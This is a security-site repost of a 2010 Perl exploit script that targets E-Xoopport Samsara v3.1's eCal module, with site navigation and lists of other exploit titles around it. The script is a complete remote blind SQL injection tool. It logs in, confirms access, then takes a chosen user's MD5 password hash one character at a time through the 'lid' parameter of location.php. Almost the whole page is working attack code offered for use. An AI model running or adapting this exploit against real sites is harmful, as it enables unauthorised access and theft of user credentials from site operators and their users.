首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
E-Xoopport - Samsara <= v3.1 (eCal module) Blind SQL Injection Exploit
来源:www.warwolfz.org 作者:_mRkZ_ 发布时间:2010-09-26  

#!/usr/bin/perl
# [0-Day] E-Xoopport - Samsara <= v3.1 (eCal module) Remote Blind SQL Injection Exploit
# Author/s: _mRkZ_, WaRWolFz Crew
# Created: 2010.09.12 after 0 days the bug was discovered.
# Greetings To: Dante90, Shaddy, StutM, WaRWolFz Crew
# Web Site: www.warwolfz.org

use strict;
use warnings;
use LWP::UserAgent;
use HTTP::Cookies;
use HTTP::Request::Common;

$^O eq 'MSWin32' ? system('cls') : system('clear');

print "

E-Xoopport - Samsara <= v3.1 (eCal Module) Remote Blind SQL Injection Exploit

+---------------------------------------------------+
| Script: E-Xoopport                                |
| Affected versions: 3.1                            |
| Bug: Remote Blind SQL Injection (eCal module)     |
| Author/s: _mRkZ_, WaRWolFz Crew                   |
| Greetz: Dante90, Shaddy, StutM, WarWolFz Crew     |
| Web Site: www.warwolfz.org                        |
+---------------------------------------------------+
| Warn: You must be able to access to 'eCal' Module |
+---------------------------------------------------+
\r\n";

if (@ARGV != 4) {
 print "\r\nUsage: perl expolit_name.pl <VictimeHost> <YourNick> <YourPass> <NickToHack>\r\n";
 exit;
}

my $host    = $ARGV[0];
my $usr     = $ARGV[1];
my $pwd     = $ARGV[2];
my $anickde = $ARGV[3];
my $anick   = '0x'.EncHex($anickde);

print "[!] Logging In...\r\n";

my %postdata = (
 uname => "$usr",
 pass => "$pwd",
 op => "login"
);
my $cookies = HTTP::Cookies->new(
 autosave => 1,
);

my $ua = LWP::UserAgent->new;
$ua->agent("Mozilla 5.0");
$ua->cookie_jar($cookies);

my $req  = (POST $host."/user.php", \%postdata);
my $request = $ua->request($req);
my $content = $request->content;
if ($content =~ /<h4>Benvenuto su/i) {
 print "[+] Logged in!\r\n";
} else {
 print "[-] Fatal Error: username/password incorrect?\r\n";
 exit;
}

print "[!] Checking permissions...\r\n";
$ua = LWP::UserAgent->new;
$ua->agent("Mozilla 5.0");
$req = $host."/modules/eCal/location.php?lid=1+AND+1=1";
$ua->cookie_jar($cookies);
$request = $ua->get($req);
$content = $request->content;
if ($content !~ /<b>Eventi nella località: <\/b>/ig) {
 print "[+] Fatal Error: Access denied\r\n";
 exit;
} else {
 print "[+] You have permissions\r\n";
}

print "[!] Exploiting...\r\n";
my $i = 1;
my $pwdchr;
while ($i != 33) {
 my $wn = 47;
 while (1) {
  $wn++;
  my $ua = LWP::UserAgent->new;
  $ua->agent("Mozilla 5.0");
  my $req  = $host."/modules/eCal/location.php?lid=1+AND+ascii(substring((SELECT+pass+FROM+ex_users+WHERE+uname=$anick+LIMIT+0,1),$i,1))=$wn";
  $ua->cookie_jar($cookies);
  my $request = $ua->get($req);
  my $content = $request->content;
  open LOGZZ, '>lol.html';
  print LOGZZ $content;
  close LOGZZ;
  if ($content !~ /<b>Eventi nella località: <\/b><a href='localleve\.php\?lid='>/ig) {
   my $cnt = $1;
   $pwdchr .= chr($wn);
   $^O eq 'MSWin32' ? system('cls') : system('clear');
   PrintChars($anickde, $pwdchr);
   last;
  }
 }
 $i++;
}

print "\r\n[!] Exploiting completed!\r\n\r\n";
print "Visit: www.warwolfz.org\r\n\r\n";

sub PrintChars {
 my $anick1 = $_[0];
 my $chars = $_[1];
print "

E-Xoopport - Samsara <= v3.1 (eCal module) Remote Blind SQL Injection Exploit

+---------------------------------------------------+
| Script: E-Xoopport                                |
| Affected versions: 3.1                            |
| Bug: Remote Blind SQL Injection (eCal module)     |
| Author/s: _mRkZ_, WaRWolFz Crew                   |
| Greetz: Dante90, Shaddy, StutM, WarWolFz Crew     |
| Web Site: www.warwolfz.org                        |
+---------------------------------------------------+
| Warn: You must be able to access to 'eCal' Module |
+---------------------------------------------------+

[!] Logging In...
[+] Logged in!
[!] Checking permissions...
[+] You have permissions
[!] Exploiting...
[+] ".$anick1."'s md5 Password: ".$chars."
";
}

sub EncHex {
 my $char = $_[0];
 chomp $char;
 my @trans = unpack("H*", "$char");
 return $trans[0];
}


#[Unit-X] Vuln-X DB 2010.09.21


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Mozilla Firefox CSS font-face
·Embarcadero Delphi XE (2011) D
·VMware Workstation <= 7.1.1 VM
·VirIT eXplorer Lite DLL Hijack
·TRAIDNT UP Version 3.0 Remote
·MS IIS 6.0 WebDAV Auth. Bypass
·OvBB V0.16a Forum Remote SQL I
·Luftguitar CMS 2 0 2 Database
·Cisco WRV210 null pointer dere
·Windows Mobile 6.5 TR (WinCE 5
·NetCut DLL Hijacking Exploit (
·Zenphoto Config Update and Com
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved